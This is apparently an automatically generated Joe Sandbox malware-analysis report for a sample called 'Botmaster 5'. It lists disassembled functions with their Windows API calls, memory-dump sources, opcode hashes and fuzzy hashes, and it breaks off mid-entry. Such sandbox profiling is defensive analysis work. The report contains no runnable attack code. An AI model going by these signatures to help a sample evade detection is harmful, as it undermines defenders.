                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Create$CompatibleDeleteObjectSectionmemset
                                                                                                                                                                                                                  • String ID: (
                                                                                                                                                                                                                  • API String ID: 905257340-3887548279
                                                                                                                                                                                                                  • Opcode ID: 732166211d5be3c216cc5e208b1adfb3b74f19b8a394b589941fbf978277bc65
                                                                                                                                                                                                                  • Instruction ID: 352b58a4e31523c88bbfe6e258336eb540932d9aebe31a5e6e955e094268c377
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 732166211d5be3c216cc5e208b1adfb3b74f19b8a394b589941fbf978277bc65
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28113071A002347BDB10ABA5EC89DEEBABDEF49715F400026F501E2141EB788D448B69
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040EE6C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63registrywindowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040EE98
                                                                                                                                                                                                                  • GetStockObject.GDI32(00000004), ref: 0040EEBB
                                                                                                                                                                                                                  • LoadIconW.USER32(00000001), ref: 0040EED6
                                                                                                                                                                                                                  • RegisterClassExW.USER32(?), ref: 0040EEE3
                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,MultimediaBase Class,004330A4,80000000,00000000,00000000,00000001,00000001,00000000,00000000,00000000), ref: 0040EF07
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ClassCreateIconLoadObjectRegisterStockWindowmemset
                                                                                                                                                                                                                  • String ID: MultimediaBase Class
                                                                                                                                                                                                                  • API String ID: 4109038729-1496039676
                                                                                                                                                                                                                  • Opcode ID: 8e620790b96bf0ce416d227042274496aa89c8f695d0ccf582c3fcf64a611170
                                                                                                                                                                                                                  • Instruction ID: 00d7914b70ec6a569881324b7e9df1d7a912eaadad3024c98ef64c2da5bb4ffc
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e620790b96bf0ce416d227042274496aa89c8f695d0ccf582c3fcf64a611170
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D1130B1910218BBDB109F56EC88DAB7FBCFB85755F00003AF500B6251E7B54950CBAA
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004284E6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56librarysleeploaderCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Kernel32.dll,00000000,00000000,-00000004,?,?,004280BA,0046BDAC,00428068,00401080,00000000,-00000008,?,?,00427AF3,-00000008), ref: 004284F4
                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00428509
                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,004280BA,0046BDAC,00428068,00401080,00000000,-00000008,?,?,00427AF3,-00000008,00000010,00010000,00000004), ref: 00428524
                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,00001000,00000000), ref: 00428546
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProcSleep
                                                                                                                                                                                                                  • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                                                                                                                                                                                  • API String ID: 938261879-1339284965
                                                                                                                                                                                                                  • Opcode ID: f1078f18bd44a9a038e26d321defbf1fe1eb105c77c27c653003104121d97978
                                                                                                                                                                                                                  • Instruction ID: f0b96ea7e710639814afae0511bc65ae7a5f4057f7dd5f47f17309b7add35707
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1078f18bd44a9a038e26d321defbf1fe1eb105c77c27c653003104121d97978
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D201D8323012357ADB116B657C4AD6F376DDF81B54B94802FF40151140FEBC4E41826E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00421174 Relevance: 10.6, APIs: 7, Instructions: 53windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000BB,?,00000000), ref: 00421191
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000BB,?,00000000), ref: 0042119E
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000043F,00000001,00000000), ref: 004211AE
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,?,00000000), ref: 004211BC
                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000C2,00000001,00435C57), ref: 004211CC
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000043F,00000000,00000000), ref: 004211D5
                                                                                                                                                                                                                  • GetWindowTextLengthW.USER32(?), ref: 004211D9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend$LengthTextWindow
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3515907081-0
                                                                                                                                                                                                                  • Opcode ID: 401caa019adb98608e94c2c8797d93e72383ba3b5aa63105fbdeac12fa0b3133
                                                                                                                                                                                                                  • Instruction ID: 5d3b65c18c1a5564a36bdc475d123bc6c49fcbb06204752337bc756a1ab0e5ac
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 401caa019adb98608e94c2c8797d93e72383ba3b5aa63105fbdeac12fa0b3133
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2012C3524030CBFEB206F92CC44F17BBADEB85788F120829F780561A0D7B36C10DA64
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00423A92 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00423ABF
                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00423ACD
                                                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000), ref: 00423AD6
                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,00000001,00000001), ref: 00423B56
                                                                                                                                                                                                                  • RedrawWindow.USER32(?,00000000,00000000,00000007), ref: 00423B6E
                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000000), ref: 00423B81
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Window$Rect$InvalidateMoveParentPointsRedraw
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2498989782-0
                                                                                                                                                                                                                  • Opcode ID: 59a92b69232847e178b6760c56cef18ff26ad3a1bfb31a13e6a0592d8dbeaa00
                                                                                                                                                                                                                  • Instruction ID: 9950aebd161415cbb088a7fa695002b6b5c8544bf775cf67e84e77d5c33ab906
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59a92b69232847e178b6760c56cef18ff26ad3a1bfb31a13e6a0592d8dbeaa00
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38314B34700615EFDB21CF58E881EAABBB8FB04742F50442AF95197251D7B9EE40CB59
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041002F Relevance: 9.1, APIs: 6, Instructions: 100memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,0045DF26,00000048,?,?,004035DB,Main), ref: 0041007A
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,?,?,0045DF26,00000048,?,?,004035DB,Main,0046AFC4,0046B074,00000046,00000000,00000046,00000000), ref: 00410088
                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,0045DF26,00000048,?,?,004035DB,Main), ref: 004100AA
                                                                                                                                                                                                                  • _stricmp.MSVCRT(00000000,?,?,?,0045DF26,00000048,?,?,004035DB,Main,0046AFC4,0046B074,00000046,00000000,00000046,00000000), ref: 004100C2
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,0045DF26,00000048,?,?,004035DB,Main,0046AFC4,0046B074,00000046,00000000,00000046,00000000), ref: 00410112
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,0045DF26,00000048,?,?,004035DB,Main,0046AFC4,0046B074,00000046,00000000,00000046,00000000), ref: 0041012C
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Heap$ByteCharFreeMultiWide$Alloc_stricmp
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1788762886-0
                                                                                                                                                                                                                  • Opcode ID: b8b32432275690270268cdd8ea4093e47d84753537d9cda360dcde86c7c15942
                                                                                                                                                                                                                  • Instruction ID: 2d711dbaa47fb6059178022fca8bf776d4e71225ccc0ac19897cbe96f07ce43a
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8b32432275690270268cdd8ea4093e47d84753537d9cda360dcde86c7c15942
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA316D71804644AFC7219F56AC84C67BFACF789720B20462FF49552260E7F65CC0CB6A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041CBA4 Relevance: 9.1, APIs: 6, Instructions: 91windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000000), ref: 0041CC06
                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0041CC14
                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,FFFFFFFC,?), ref: 0041CC8C
                                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0041CCCC
                                                                                                                                                                                                                  • SetClassLongW.USER32(00000000,?,FFFFFFF6), ref: 0041CCE6
                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0041CCEE
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: DeleteLongObject$BrushClassColorMessageSendWindow
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3590461730-0
                                                                                                                                                                                                                  • Opcode ID: 04296a4c1f84cce314a4b91a157e29d77dcf7e9e1e3d5ff1f74da7561530061b
                                                                                                                                                                                                                  • Instruction ID: cac887c7a3ae18cf331d03d3df4760080c69699e9d9b0a4809766e5aca0d88cf
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04296a4c1f84cce314a4b91a157e29d77dcf7e9e1e3d5ff1f74da7561530061b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95312171154524BBCB113F32FD429D93B26FB1430CB540137F526D11B2FBA95DA0AA9E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040E3D0 Relevance: 9.1, APIs: 6, Instructions: 87memoryfileCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040E3EF
                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000), ref: 0040E405
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,?,00000000), ref: 0040E472
                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,?,00000000), ref: 0040E488
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0040E4A3
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000000), ref: 0040E4AC
                                                                                                                                                                                                                    • Part of subcall function 0040EF26: _wfopen.MSVCRT ref: 0040EF3D
                                                                                                                                                                                                                    • Part of subcall function 0040EF26: fseek.MSVCRT ref: 0040EF5E
                                                                                                                                                                                                                    • Part of subcall function 0040EF26: fclose.MSVCRT ref: 0040EF9E
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: File$Heap$AllocCloseCreateFreeHandleReadSize_wfopenfclosefseek
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1403107938-0
                                                                                                                                                                                                                  • Opcode ID: c20f6d685756b8b06b841c3695f8e0b040281fb7b135761049b79b54c75e3039
                                                                                                                                                                                                                  • Instruction ID: 2470fafa84873e90002fa7614df3778da9d6c0eaa1faf791e1aa43c248240dfe
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c20f6d685756b8b06b841c3695f8e0b040281fb7b135761049b79b54c75e3039
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF217170500244BBDB216F66EC48E9F7FBCFB85754F10453AF501B21A1D6B84D60DA6A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00415BA0 Relevance: 9.1, APIs: 7, Instructions: 332COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 2803490479-0
                                                                                                                                                                                                                  • Opcode ID: 829c938b4c233614cd2e9627739bce057c6fe4a7a9630a421d008d6df0c4442b
                                                                                                                                                                                                                  • Instruction ID: ed5273594419c0812347ddde3a1d54f4809aebb810219a78c9a3430650828ada
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 829c938b4c233614cd2e9627739bce057c6fe4a7a9630a421d008d6df0c4442b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47B1B3B1908701CBD320DF68D880AEBB7E4ABC5364F040A2EFA9593291E775D948CB57
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00420416 Relevance: 9.1, APIs: 6, Instructions: 76windowCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00420433
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 0042044F
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0042047E
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000040B,00000000,00000001), ref: 004204A6
                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000153,000000FF,?), ref: 004204BE
                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000014A,000000FF,?), ref: 004204D6
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: MessageSend$RectWindow
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1944065686-0
                                                                                                                                                                                                                  • Opcode ID: e73ef3ad9e952cfd5cbc253e9c777ed3f1c1229a1835e8f4f95f36675f8f5762
                                                                                                                                                                                                                  • Instruction ID: ef9ab00176b0d5fde911d06d2d6e0fb13a24657b0cf524638200c48bfa0a4c54
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e73ef3ad9e952cfd5cbc253e9c777ed3f1c1229a1835e8f4f95f36675f8f5762
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE216B71500219EFDF21EFA4EC8089EBBF9FF04354B50862AF651A61A1D3B19D10CF29
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00425DFF Relevance: 9.1, APIs: 6, Instructions: 70memoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00425E14
                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00425E3B
                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00425F43,?), ref: 00425E61
                                                                                                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,?,00000000,?,00000000), ref: 00425EA1
                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00425EB3
                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 00425EBE
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
